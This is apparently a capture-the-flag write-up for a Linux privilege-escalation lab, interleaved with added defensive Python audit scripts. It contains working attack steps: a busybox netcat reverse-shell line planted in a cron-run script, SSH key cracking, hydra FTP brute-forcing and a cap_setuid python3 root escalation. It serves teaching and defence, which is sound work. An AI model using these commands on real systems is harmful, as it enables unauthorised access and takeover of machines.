Scenario
This is the Capstone Challenge for Ryan’s Hacking Linux course on Simply Cyber Academy. As a result, this lab isn’t strictly focused on realism, but rather teaching proper enumeration, lateral movement, and privilege escalation on a Linux machine.
There are 6 flags on the machine (you can see the location of each by clicking the ‘hint’ button to make it less of a rabbit chase). There are also multiple ways to solve the machine… so if you solve it in one way, you can go back and see if you can find the 2nd way.
Happy hacking!
Network Enumeration
sudo nmap -p- --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -T4 -Pn -v -oN quick_tcp_scan 10.1.125.115
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
35997/tcp open unknown
36071/tcp open unknown
36605/tcp open unknown
43297/tcp open unknown
50889/tcp open unknown
sudo nmap -p 21,22,80,111,2049,35997,36071,36605,43297,50889 -A -oN detailed_scan -oX detailed_scan.xml 10.1.125.115
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 202 Sep 21 00:04 pwlist.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.0.247
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 30:79:bf:62:52:65:f6:f2:cb:41:67:58:c2:8c:24:c9 (ECDSA)
|_ 256 c4:06:e2:d0:6c:82:d8:13:12:70:5d:89:20:dd:36:82 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42410/udp mountd
| 100005 1,2,3 50619/tcp6 mountd
| 100005 1,2,3 50889/tcp mountd
| 100005 1,2,3 58288/udp6 mountd
| 100021 1,3,4 33763/tcp6 nlockmgr
| 100021 1,3,4 35997/tcp nlockmgr
| 100021 1,3,4 40002/udp nlockmgr
| 100021 1,3,4 41008/udp6 nlockmgr
| 100024 1 36605/tcp status
| 100024 1 49205/udp6 status
| 100024 1 57463/tcp6 status
| 100024 1 60118/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35997/tcp open nlockmgr 1-4 (RPC #100021)
36071/tcp open mountd 1-3 (RPC #100005)
36605/tcp open status 1 (RPC #100024)
43297/tcp open mountd 1-3 (RPC #100005)
50889/tcp open mountd 1-3 (RPC #100005)
sudo nmap -sU -p 53,161,123 --min-rate 100 -oN udp_scan 10.1.125.115
PORT STATE SERVICE
53/udp closed domain
123/udp closed ntp
161/udp closed snmp
FTP Enumeration (Port 21)
ftp anonymous@10.1.125.115 21
Connected to 10.1.125.115.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23283|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 202 Sep 21 00:04 pwlist.txt
226 Directory send OK.
pwlist.txt contains what look like passwords, with an empty line between each value. Let's use awk to drop the blank lines; the consolidated list may be handy later.
awk 'NF' pwlist.txt
password1
123456
letmein
qwerty
password
secret
ftp123
admin
passw0rd
iloveyou
welcome
monkey
dragon
shadow
baseball
football
abc123
trustno1
sunshine
princess
NFS Enumeration (Port 111 & 2049)
showmount -e 10.1.125.115
Export list for 10.1.125.115:
/srv/nfs/user1 *
sudo mkdir /mnt/nfs
sudo mount -t nfs 10.1.125.115:/srv/nfs/user1 /mnt/nfs
ls -la /mnt/nfs
total 16
drwxr-xr-x 2 1001 1001 4096 Sep 21 13:31 .
drwxr-xr-x 3 root root 4096 Nov 9 05:35 ..
-rw-r--r-- 1 1001 1001 2655 Sep 21 13:31 id_rsa
-rw-r--r-- 1 1001 1001 574 Sep 21 13:31 id_rsa.pub
We are able to mount the user1 share, which is exported to any host (*), and retrieve an SSH key pair for user1.
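As an added example (not part of the original writeup), here is a small Python audit of /etc/exports entries that flags the pattern seen here: a share offered to every host. The sample lines are constructed; the first mirrors the showmount output above and the corrected entry assumes a 10.1.125.0/24 management network.

```python
import re

# Constructed /etc/exports lines for this demo. The first mirrors the export
# showmount reported on this host (/srv/nfs/user1 offered to *); the last is
# the corrected form: one client network, read-only, root squashed.
SAMPLE_EXPORTS = """
/srv/nfs/user1 *
/srv/backup *(rw,no_root_squash,sync)
/srv/nfs/user1 10.1.125.0/24(ro,root_squash,sync)
"""

# An /etc/exports client entry is host[(opt,opt,...)] with no space before '('.
ENTRY_RE = re.compile(r'(\S+?)(?:\((.*?)\))?$')

def parse_exports(text):
    """Yield (path, client, [options]) for every client of every export line."""
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            m = ENTRY_RE.match(client)
            opts = [o for o in (m.group(2) or '').split(',') if o]
            yield path, m.group(1), opts

def audit_exports(text):
    """Return [(path, client, [problems])] for exports a reviewer should question.
    Exports with no options use nfsd defaults (ro, root_squash), so a bare '*'
    is world-readable even though it is not world-writable."""
    findings = []
    for path, client, opts in parse_exports(text):
        problems = []
        if client == '*' or client.startswith('*.'):
            problems.append('wildcard client: any host may mount')
        if 'no_root_squash' in opts:
            problems.append('no_root_squash: client root is server root')
        if 'insecure' in opts:
            problems.append('insecure: unprivileged source ports allowed')
        if 'rw' in opts and client.startswith('*'):
            problems.append('read-write to a wildcard client')
        if problems:
            findings.append((path, client, problems))
    return findings

if __name__ == '__main__':
    for path, client, problems in audit_exports(SAMPLE_EXPORTS):
        print(f'{path} {client}: ' + '; '.join(problems))
```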
Web Enumeration (Port 80)
Directory Enumeration
ffuf -u http://10.1.125.115/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -c
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.1.125.115/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
wp-admin [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 248ms]
wp-includes [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 250ms]
wp-content [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 250ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 245ms]
:: Progress: [29999/29999] :: Job [1/1] :: 163 req/sec :: Duration: [0:03:16] :: Errors: 1 ::
Web file enumeration
ffuf -u http://10.1.125.115/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -c -fc 403,500
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.1.125.115/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403,500
________________________________________________
index.html [Status: 200, Size: 10671, Words: 3496, Lines: 364, Duration: 245ms]
readme.html [Status: 200, Size: 7425, Words: 752, Lines: 99, Duration: 244ms]
license.txt [Status: 200, Size: 19903, Words: 3331, Lines: 385, Duration: 244ms]
wp-config.php [Status: 200, Size: 4, Words: 1, Lines: 5, Duration: 244ms]
. [Status: 200, Size: 10671, Words: 3496, Lines: 364, Duration: 247ms]
wp-load.php [Status: 200, Size: 4, Words: 1, Lines: 5, Duration: 249ms]
:: Progress: [17129/17129] :: Job [1/1] :: 162 req/sec :: Duration: [0:01:47] :: Errors: 0 ::
The web server seems to be hosting a WordPress site, but we are unable to access any of its login pages.
Foothold
ssh user1@10.1.125.115 -i id_rsa
The authenticity of host '10.1.125.115 (10.1.125.115)' can't be established.
ED25519 key fingerprint is SHA256:d63zLEoy1MDYDElorZ+sa58UKFRFW39jODBGLKL2tHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.125.115' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
A passphrase is required for the SSH key.
ssh2john id_rsa > key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt key.hash --force
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sxxxxxx (id_rsa)
1g 0:00:03:23 DONE (2025-11-09 05:53) 0.004903g/s 25.18p/s 25.18c/s 25.18C/s jodie..flaca
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
user1@ip-10-1-125-115:/opt/user1$ ls -la
total 12
drwx------ 2 user1 root 4096 Sep 19 16:16 .
drwxr-xr-x 7 root root 4096 Sep 19 16:16 ..
-rw------- 1 user1 root 45 Sep 21 00:04 flag1
Flag1 can be obtained in the /opt/user1 directory.
Cron
timeout 3m ./pspy64 -pf -i 1000
2025/11/10 11:51:01 FS: ACCESS | /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
2025/11/10 11:51:01 FS: OPEN | /etc/ld.so.cache
2025/11/10 11:51:01 FS: OPEN | /usr/lib/x86_64-linux-gnu/libc.so.6
2025/11/10 11:51:01 FS: ACCESS | /usr/lib/x86_64-linux-gnu/libc.so.6
2025/11/10 11:51:01 CMD: UID=1002 PID=27765 | /bin/sh -c /tmp/backup.sh
2025/11/10 11:51:01 CMD: UID=0 PID=27766 | /usr/sbin/CRON -f -P
2025/11/10 11:51:01 FS: CLOSE_NOWRITE | /etc/ld.so.cache
2025/11/10 11:51:01 FS: OPEN | /etc/group
2025/11/10 11:51:01 FS: ACCESS | /etc/group
user1@ip-10-1-125-115:/tmp$ ls -la
total 56
drwxrwxrwt 14 root root 4096 Nov 10 11:49 .
drwxr-xr-x 22 root root 4096 Nov 10 11:19 ..
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .X11-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .XIM-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .font-unix
drwx------ 2 root root 4096 Nov 10 11:19 snap-private-tmp
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-ModemManager.service-EbHOp9
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-apache2.service-OtpCCb
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-chrony.service-69gxG1
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-polkit.service-W313qG
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-systemd-logind.service-D56nRj
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-systemd-resolved.service-5CFyLp
drwx------ 2 user1 user1 4096 Nov 10 11:38 tmux-1001
pspy shows cron executing /tmp/backup.sh as UID 1002 (user2), and the listing of the world-writable /tmp shows that the script does not exist, so whatever user1 places there will be run as user2.
user1@ip-10-1-125-115:/tmp$ echo 'busybox nc 10.200.19.99 80 -e /bin/sh' > backup.sh
user1@ip-10-1-125-115:/tmp$ chmod +x backup.sh
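As an added example (not part of the original writeup), this Python audit checks system crontab lines for the weakness just exploited: a job whose script lives in a world-writable directory or is itself writable by others. The crontab lines and the directory layout are constructed in a temp dir to mirror the /tmp/backup.sh case.

```python
import os
import stat
import tempfile

def cron_command_path(line):
    """Return the program a system crontab line runs, or None for comments/blank lines.
    System crontab fields: minute hour dom month dow user command; a '/bin/sh -c X'
    wrapper (as pspy showed for /tmp/backup.sh) is unwrapped to X."""
    fields = line.split()
    if not fields or fields[0].startswith('#') or len(fields) < 7:
        return None
    cmd = fields[6:]
    if cmd[:2] == ['/bin/sh', '-c']:
        cmd = cmd[2:]
    return cmd[0] if cmd else None

def assess_target(path):
    """Classify how an untrusted local user could influence what cron executes."""
    parent = os.path.dirname(path) or '/'
    pmode = os.stat(parent).st_mode
    dir_world_writable = bool(pmode & stat.S_IWOTH)
    if not os.path.exists(path):
        # A missing script in a world-writable directory can be created by anyone,
        # sticky bit or not, and cron will run it as the crontab's user.
        return 'missing in world-writable dir' if dir_world_writable else 'missing'
    if os.stat(path).st_mode & stat.S_IWOTH:
        return 'script writable by others'
    if dir_world_writable and not (pmode & stat.S_ISVTX):
        return 'parent dir world-writable without sticky bit'
    return 'ok'

def audit_cron(lines):
    """Return [(crontab line, verdict)] for every job line."""
    out = []
    for line in lines:
        path = cron_command_path(line)
        if path:
            out.append((line.strip(), assess_target(path)))
    return out

def demo():
    """Constructed layout in a temp dir: a sticky world-writable tmp/ with no backup.sh
    (the situation on this box), a sane script in opt/, and a 0777 script in opt/."""
    root = tempfile.mkdtemp()
    tmp, opt = os.path.join(root, 'tmp'), os.path.join(root, 'opt')
    os.mkdir(tmp); os.chmod(tmp, 0o1777)
    os.mkdir(opt); os.chmod(opt, 0o755)
    good, bad = os.path.join(opt, 'good.sh'), os.path.join(opt, 'bad.sh')
    for p, mode in ((good, 0o755), (bad, 0o777)):
        open(p, 'w').close(); os.chmod(p, mode)
    lines = [f'* * * * * user2 /bin/sh -c {tmp}/backup.sh',
             f'0 3 * * * root {good}', f'0 4 * * * root {bad}', '# comment']
    return [verdict for _, verdict in audit_cron(lines)]
```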
User2
user2@ip-10-1-125-115:~$ whoami
user2
user2@ip-10-1-125-115:~$ id
uid=1002(user2) gid=1002(user2) groups=1002(user2)
Viewing the listening sockets, we can see MySQL bound to localhost only (port 3306).
user2@ip-10-1-125-115:/var/www/html$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 0.0.0.0:111 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:60483 0.0.0.0:*
LISTEN 0 64 0.0.0.0:2049 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:53611 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:59813 0.0.0.0:*
LISTEN 0 64 0.0.0.0:38281 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:53885 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 4096 [::]:32879 [::]:*
LISTEN 0 4096 [::]:111 [::]:*
LISTEN 0 4096 [::]:40003 [::]:*
LISTEN 0 511 *:80 *:*
LISTEN 0 64 [::]:2049 [::]:*
LISTEN 0 4096 [::]:22 [::]:*
LISTEN 0 4096 [::]:56801 [::]:*
LISTEN 0 4096 [::]:39383 [::]:*
LISTEN 0 64 [::]:45751 [::]:*
We can find some database credentials in the WordPress wp-config.php file.
user2@ip-10-1-125-115:/var/www/html$ cat wp-config.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'wppassword');
define('DB_HOST', 'localhost');
?>
With these credentials we can log in to the database and retrieve user3's password, which is stored in plaintext.
user2@ip-10-1-125-115:/var/www/html$ mysql -u wpuser -D wordpress -h localhost -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 8.0.43-0ubuntu0.24.04.2 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| performance_schema |
| wordpress |
+--------------------+
3 rows in set (0.00 sec)
mysql> use wordpress;
Database changed
mysql> show tables;
+---------------------+
| Tables_in_wordpress |
+---------------------+
| flags |
| users |
+---------------------+
2 rows in set (0.00 sec)
mysql> DESC users;
+----------+-------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+----------------+
| id | int | NO | PRI | NULL | auto_increment |
| username | varchar(50) | YES | | NULL | |
| password | varchar(50) | YES | | NULL | |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.01 sec)
mysql> SELECT username,password FROM wordpress.users;
+----------+---------------+
| username | password |
+----------+---------------+
| user3 | usxxxxxxx|
+----------+---------------+
1 row in set (0.00 sec)
The 4th flag can also be retrieved from this database (the flags table).
User3
There is a stray python3 binary in user3's home folder with the cap_setuid capability set, which we can use to escalate privileges to root.
user3@ip-10-1-125-115:~$ find . -type f -exec getcap {} \;
./python3 cap_setuid=ep
user3@ip-10-1-125-115:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ip-10-1-125-115:~# id
uid=0(root) gid=1003(user3) groups=1003(user3)
root@ip-10-1-125-115:~# whoami
root
root@ip-10-1-125-115:~#
With the root user we are able to get the final flag.
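As an added example (not part of the original writeup), here is a Python parser for getcap -r output that flags the finding above: an interpreter outside the system paths carrying cap_setuid. It handles both the "path caps" format shown here and the older "path = caps" format; the sample output is constructed.

```python
import os
import re

# Capabilities that let a process change identity or bypass DAC, i.e. a direct
# path to root when set on a binary any user can run.
DANGEROUS = {'cap_setuid', 'cap_setgid', 'cap_dac_override', 'cap_dac_read_search',
             'cap_fowner', 'cap_chown', 'cap_sys_admin', 'cap_sys_ptrace', 'cap_sys_module'}
INTERPRETERS = ('python', 'perl', 'ruby', 'node', 'php', 'lua')

# getcap prints either "path caps" (as on this host) or "path = caps" (older libcap).
LINE_RE = re.compile(r'^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>\S.*)$')

def parse_getcap(line):
    """Return (path, {capability names}) for one getcap output line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps = set()
    for clause in m.group('caps').split():          # e.g. cap_a,cap_b=ep  cap_c+ep
        names = re.split(r'[=+-]', clause, maxsplit=1)[0]
        caps.update(n for n in names.split(',') if n)
    return m.group('path'), caps

def risky_binaries(output):
    """Return [(path, [reasons])] for getcap lines worth a finding."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap(line)
        if not parsed:
            continue
        path, caps = parsed
        reasons = [f'{c} grants privilege escalation' for c in sorted(caps & DANGEROUS)]
        if reasons and os.path.basename(path).startswith(INTERPRETERS):
            reasons.append('interpreter: runs arbitrary code with the capability')
        if reasons and not path.startswith(('/usr/', '/bin/', '/sbin/')):
            reasons.append('outside system binary paths')
        if reasons:
            findings.append((path, reasons))
    return findings

# Constructed getcap -r output; the first line is the finding from this machine.
SAMPLE_GETCAP = """\
/home/user3/python3 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
"""
```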
Ftpuser
To find ftpuser's password, we can use pwlist.txt from the FTP server as a wordlist and brute-force the account.
hydra -l ftpuser -P pwlist.txt ftp://10.1.125.115
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-10 06:27:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:1/p:21), ~2 tries per task
[DATA] attacking ftp://10.1.125.115:21/
[21][ftp] host: 10.1.125.115 login: ftpuser password: sxxxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-10 06:27:04
user1@ip-10-1-125-115:/var/www/html$ cd /home
user1@ip-10-1-125-115:/home$ su ftpuser
Password:
ftpuser@ip-10-1-125-115:/home$ whoami
ftpuser
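As an added example (not part of the original writeup), here is the detection side of the hydra run above: a Python sliding-window detector over vsftpd.log login records that alerts on a burst of failures from one client and on a success that follows them. The log lines are constructed to match the 21-try, four-second run shown above and assume vsftpd's default "[user] FAIL LOGIN: Client" record format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# vsftpd.log login records look like:
#   Mon Nov 10 06:27:01 2025 [pid 1234] [ftpuser] FAIL LOGIN: Client "10.0.0.247"
LOG_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse_login(line):
    """Return (timestamp, user, result, client_ip) or None for non-login lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%a %b %d %H:%M:%S %Y')
    return ts, m.group('user'), m.group('result'), m.group('ip')

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Sliding-window detector keyed on (client, user).
    Emits ('burst', ip, user, n) once n failures land inside window_s seconds, and
    ('success-after-failures', ip, user, n) when a login succeeds with failures
    still in the window (the hydra pattern: many FAILs, then one OK)."""
    fails = defaultdict(deque)
    alerts, fired = [], set()
    for line in lines:
        rec = parse_login(line)
        if not rec:
            continue
        ts, user, result, ip = rec
        q = fails[(ip, user)]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()                      # expire failures outside the window
        if result == 'FAIL':
            q.append(ts)
            if len(q) >= threshold and (ip, user) not in fired:
                fired.add((ip, user))
                alerts.append(('burst', ip, user, len(q)))
        elif q:
            alerts.append(('success-after-failures', ip, user, len(q)))
            q.clear()
    return alerts

# Constructed log: 20 failures for ftpuser from one client in four seconds, a
# single unrelated failure, the eventual success, then a normal anonymous login.
SAMPLE_LOG = [f'Mon Nov 10 06:27:0{i // 5} 2025 [pid {100 + i}] [ftpuser] FAIL LOGIN: Client "10.0.0.247"'
              for i in range(20)] + [
    'Mon Nov 10 06:27:03 2025 [pid 121] [user1] FAIL LOGIN: Client "10.1.125.2"',
    'Mon Nov 10 06:27:04 2025 [pid 122] [ftpuser] OK LOGIN: Client "10.0.0.247"',
    'Mon Nov 10 06:27:30 2025 [pid 123] [ftp] OK LOGIN: Client "10.1.125.2", anon password "?"',
]
```

Anonymous logins appear with user ftp, so the same detector also covers password guessing against the anonymous account.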